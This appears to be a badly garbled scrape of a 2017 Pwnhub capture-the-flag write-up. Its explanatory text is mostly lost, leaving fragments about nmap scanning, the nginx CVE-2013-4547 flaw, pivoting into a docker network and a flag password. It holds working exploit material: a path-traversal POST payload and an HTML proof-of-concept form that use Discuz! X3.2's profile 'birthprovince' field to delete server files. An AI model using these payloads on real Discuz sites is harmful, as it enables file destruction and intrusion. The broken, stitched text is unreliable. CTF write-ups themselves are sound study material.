pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û...
Transcript of pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û...
Pwnhub 2013C014 2017-10-04
54.223.177.152+80
2017.10.03 17+50+16 Discuz Discuz
2017.10.03 11+24+40 Flag
2017.10.02 15+45+49 Nginx server
CVE-2013-4547 + + + VPN + docker + Discuz!X
CVE-2013-4547
nginxnmap 22 80ssh
.DS_Store
1
2
3
4
5
admin/
config/
includes/
pwnhub/
upload /
pwnhub/ 403cve-2013-4547 pwmhub/
.DS_Store
untar.py
return.cfg
123 1.cfg tar 123
docker/etc/crontab
cron_run.sh
1
2cd /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/ && python run.py
run.py
mail_send.pyVPN
mac L2TP/IPsec PSK …
docker
docker 172.17.x.x ipip 172.17.0.3
index.php
Oh Hacked safe.phpnmap 80 3306 8090
8090 Discuz! X3.2
Discuz!X
Discuz!Xindex.php include safe.phpsafe.php
1 http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
post
1 birthprovince=../../../../../../../../../../../../usr/share/nginx/html/safe.php&profilesubmit=1&formhash=b8f4701a
formhash hashCentOs nginx /usr/share/nginx/html/
1 http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
poc:
1
2
3
4
5
6
<form action="http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST"
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="b8f4701a"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>
safe.php referer
get flag
http://172.17.0.3/index.php passwd=jiajiajiajiajia